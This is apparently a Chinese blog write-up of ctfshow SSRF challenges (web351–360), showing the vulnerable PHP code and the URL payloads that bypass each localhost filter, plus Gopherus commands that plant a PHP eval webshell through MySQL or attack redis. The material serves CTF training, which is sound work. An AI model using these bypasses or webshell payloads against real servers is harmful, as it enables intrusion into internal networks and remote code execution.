ctfshow-SSRF

最新推荐文章于 2024-04-26 15:38:33 发布
最新推荐文章于 2024-04-26 15:38:33 发布
阅读量430 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/njh18790816639/article/details/115859359
版权

SSRF
其全称:Server—Side Request Forgery :服务器端请求伪造
是一种由攻击者构造形成的由 服务器端发起请求的一个安全漏洞。一般情况下,攻击的目是外网没有办法访问的内网。
很多WEb应用都其提供了从其他服务器上获取数据的功能,使用指定的url,web 应用可以获取图片,下载文件,读取文件等。这个功能如果被恶意使用,可以利用存在缺陷的web引用做为代理,攻击远程和本地服务器。

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

curl_setopt — 设置一个cURL传输选项
curl_init — 初始化一个cURL会话
curl_close — 关闭一个cURL会话

这里扫描发现一个flag.php这个页面但是非本地用户是不允许访问的!
肯定是要让我们以本地用户去访问127.0.0.1/flag.php!

url=http://127.0.0.1/flag.php

web352~353(ip 绕过)

十六进制
url=http://0x7F.0.0.1/flag.php

八进制
url=http://0177.0.0.1/flag.php

10 进制整数格式
url=http://2130706433/flag.php

16 进制整数格式.
url=http://0x7F000001/flag.php

还有一种特殊的省略模式

127.0.0.1写成127.1
用CIDR绕过localhost

url=http://127.127.127.127/flag.php
还有很多方式

url=http://0/flag.php
url=http://0.0.0.0/flag.php

https://tool.520101.com/wangluo/jinzhizhuanhuan/
转换网站!

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

web354(DNS重绑定)

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

这里看着大师傅做的!

url=http://sudo.cc/flag.php

parse_url — 解析 URL,返回其组成部分
CURLOPT_HEADER 启用时会将头文件的信息作为数据流输出。
CURLOPT_RETURNTRANSFER TRUE 将curl_exec()获取的信息以字符串返回,而不是直接输出。

web355

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

这里是要求url里面的host主体部分小于5的!

url=http://127.1/flag.php

这样构造就可以了!

web356

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?> hacker

这里变本加厉的将长度缩短为3一下了!

http://0/flag.php

0在 linux 系统中会解析成127.0.0.1在windows中解析成0.0.0.0

web357(DNS重绑定)(未做)

DNS是Domain Name Service的缩写,计算机域名服务器,在Internet上域名与IP地址之间是一一对应的,域名虽然便于人们记忆,但机器之间只能互相认识IP地址,它们之间的转换工作称为域名解析,而域名解析需要由专门的域名解析服务器来完成,这就是DNS域名服务器。

这里其实还是有点不理解的!所以不再所说什么了!

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?> scheme

gethostbyname — 返回主机名对应的 IPv4地址。
filter_var — 使用特定的过滤器过滤一个变量
file_get_contents — 将整个文件读入一个字符串

web358(URL BYPASS)

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

正则表达式意思为以ctf开头,以show结尾

http://ctf.@127.0.0.1/flag.php?show

359(gopherus-无密码mysql)(未做)

这里是个登录框!

python gopherus.py --exploit mysql
root
select "<?php eval@($_POST[1]);?>" into outfile "/var/www/html/a.php"

在这里插入图片描述
这里用到了Gopherus工具!这是用python2写的,所以我们要有python2的环境!
在这里插入图片描述

web360(redis)(未做)

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

python gopherus.py --exploit redis
在这里插入图片描述

四代机您发多少
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
mars-ssrf:SSRFDedektörü
03-04
火星 SSRFDedektörü
ctfshow--web--爆破
whisper921的博客
01-29 3530
web21 先输入账号admin,密码随便输入,bp抓包 输入的账户名和密码被base64加密了,用burp自带解密发现账户名和密码之间用冒号隔开了 接下来可以爆破了 载入题目字典 加前缀 再加一个编码 这个应该取消掉,因为里面有=,会造成编码失败 把flag格式输进去 开始爆破 得到flag web22 推荐使用这个网站 输入wp.ctf.show 没有发现 输入其他地址也没...
[ctfshow]终极考核wp
cosmoslin的博客
07-07 1618
页面明文flag首页http头首页查看源码,发现可疑路径 访问,需要登录,抓包得到flag进入登陆页面需要输入密码开门,查看js文件,发现密码为输入密码后得到flag备份数据,数据中存在flag在网络测试功能当中可以执行命令,抓包修改测试命令为ls发现,访问得到一串url编码解码得到flag在系统更新处填入645的flag,进行权限验证后远程更新此时抓一下远程更新的包这里存在远程请求文件,很像文件包含,尝试读一下文件确实可以,我们依次读取一下web 643中得到的文件 最终flag在当中 利用数组绕
ctfshow web261
qq_45694932的博客
10-06 519
<?php highlight_file(__FILE__); class ctfshowvip{ public $username; public $password; public $code; public function __construct($u,$p){ $this->username=$u; $this->password=$p; } public function __wakeup()
CTFshow 反序列化 web261
Kradress的博客
12-20 2268
目录源码思路题解总结 源码 <?php highlight_file(__FILE__); class ctfshowvip{ public $username; public $password; public $code; public function __construct($u,$p){ //对象创建时会自动调用。 $this->username=$u; $this->password=$p; }
ctfshow(vip限免题)
Aurora_lili的博客
04-07 843
Cookie就是由服务器发给客户端的特殊信息,这些信息中会包含客户端的身份信息,客户端在收到这些信息后会以文本文件的方式保存在客户端,之后客户端每次向服务器发送请求的时候都会在Cookie Header中带上这些信息。是由于运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。svn1.6及以前版本会在项目的每个文件夹下都生成一个.svn文件夹,里面包含了所有文件的备份,文件名为 .svn/text-base/文件名.svn-base。
《重生之我要把ctfshow刷完》之信息收集篇
weixin_44502336的博客
11-28 926
这段时间一直搞比赛,而且日常零输出,所以复现了几个礼拜的小呆决定重拾自己和学弟一人250买的会员,开始ctfshow的"web入门"之旅(不得不说,ctfshow真的是yyds) 啪很快啊。 第一章是信息收集 web1 很简单的,flag就在前端html源码里面 web2 众所周知,类似于这种无法查看前端源代码的情况,其实我们可以直接用view-source: web3 有时候,让我们抓个包这种题目,直接F12 进入network直接看响应头,就能直接找到flag web4 web4其实也是一个ctf常用
ctfshowJAVA
njh18790816639的博客
04-16 2315
web279~279 这里便是跑脚本的事了! python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action 然后进行利用 python Struts2Scan.py -u http://892a1226-9adc-4c5b-a700-c1ba9ca6ee26.challenge.ctf.show:8080/login.action -n S2-009 --e
[极客大挑战 2019]BuyFlag 1
qq_43618536的博客
07-02 2898
BUUCTF的[极客大挑战 2019]BuyFlag 1
CTFShow-MISC入门篇详细wp(1-56)
热门推荐
Aluxian_的博客
07-19 1万+
cffshow-misc 入门 wp解析
【ctf.show-web赛题】
一纸荒芜的博客
03-21 2008
主要分享自己做题的心得和积累,共勉之。
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问.zip
04-09
开发技术-硬件
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问题研究.zip
04-09
开发技术-硬件
exchange-ssrf-rce:交换服务
03-15
用法 python3 .\exchange-exp.py 使用方式: python PoC.py <target> ...[*] Getting ComputerName and DomainName [+] domain : xxx-xxxx | [+] computer : xxx.xxx-xxxx.xxx | [*] Getting LegacyDN ...
【CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 2216
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
ctfshowSSRF
遇事不决冲冲冲
10-02 3483
web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 没有防护直
ctfshow2
lovechinasomuch的博客
04-19 324
查看源代码,发现js泄漏文件,有一段可疑的unicode码,把它转成中文显示“你赢了,去幺幺零点皮爱吃皮看看”即网站访问地址后面拼接 /110.php即可得到flag。忘记密码 需要所在地城市可通过添加qq号查看:西安,重置密码为admin7789 输入账号admin 密码admin7789得到flag。查看页面源码,没有发现有用信息 访问robots.txt得到admin 访问后得到管理员账号admin。接着就是密码的猜测我猜不到 将进度条滑到最后,发现了一串电话数字,作为密码,登录成功后拿到flag。
C++-基础(2)
最新发布
2401_84253132的博客
04-26 209
C++14:C++14 标准于 2014 年发布,是对 C++11 的一些小的改进和修订,没有引入大规模的新功能,但对现有功能做了一些优化和改进。​C++17:C++17 标准于 2017 年发布,引入了一些新特性和改进,如结构化绑定、折叠表达式、并行算法、文件系统库等,进一步提高了 C++ 的现代化程度。​C++20:C++20于 2020 年发布。它引入了许多新特性,包括概念、范围 for 循环、三向比较运算符、协程、模块化等,进一步丰富了 C++ 语言的功能。​。
ctfshow ssrf
08-16
- *3* [ctfshow ssrf](https://blog.csdn.net/weixin_52240463/article/details/122659261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值